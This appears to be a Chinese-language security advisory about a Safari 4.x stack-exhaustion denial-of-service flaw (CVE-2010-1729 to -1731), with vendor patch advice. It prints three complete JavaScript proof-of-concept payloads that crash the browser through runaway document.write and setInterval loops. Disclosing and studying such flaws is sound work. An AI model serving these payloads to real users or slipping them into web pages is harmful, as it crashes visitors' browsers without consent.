安全研究
安全漏洞
Safari浏览器栈耗尽拒绝服务漏洞
发布日期:2010-04-27
更新日期:2010-04-29
受影响系统:Apple Safari 4.0.5
Apple Safari 4.0.4
Apple Safari 4.0.3
描述:
CVE(CAN) ID:
CVE-2010-1729,
CVE-2010-1730,
CVE-2010-1731
Safari是苹果家族机器操作系统中默认捆绑的WEB浏览器。
用户受骗使用Safari浏览器访问了恶意网页就可能耗尽所有可用栈资源,导致浏览器崩溃。
<*来源:Mathias Karlsson
链接:
http://h.ackack.net/?p=258
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<script>
a="<script>var b=\"<iframe src='javascript:window.location=\"boom\"'></iframe>\";while(1){b=b+b;document.write(b);}</scr"+"ipt>";
while(1){
a=a+a;
document.write(a);
}
</script>
<html>
<script>
loop1();
var a = "<blink>";
function loop1()
{
document.write(a);
setInterval(loop2,0);
}
function loop2()
{
document.write(a);
setInterval(loop1,0);
}
</script>
</html>
<html>
<script>
loop();
function loop()
{
setInterval(doit,0);
}
function doit()
{
var b="<marquee>";
document.write(b);
setInterval(loop,0);
}
</script>
</html>
建议:
厂商补丁:
Apple
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.apple.com浏览次数:2445
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障 |
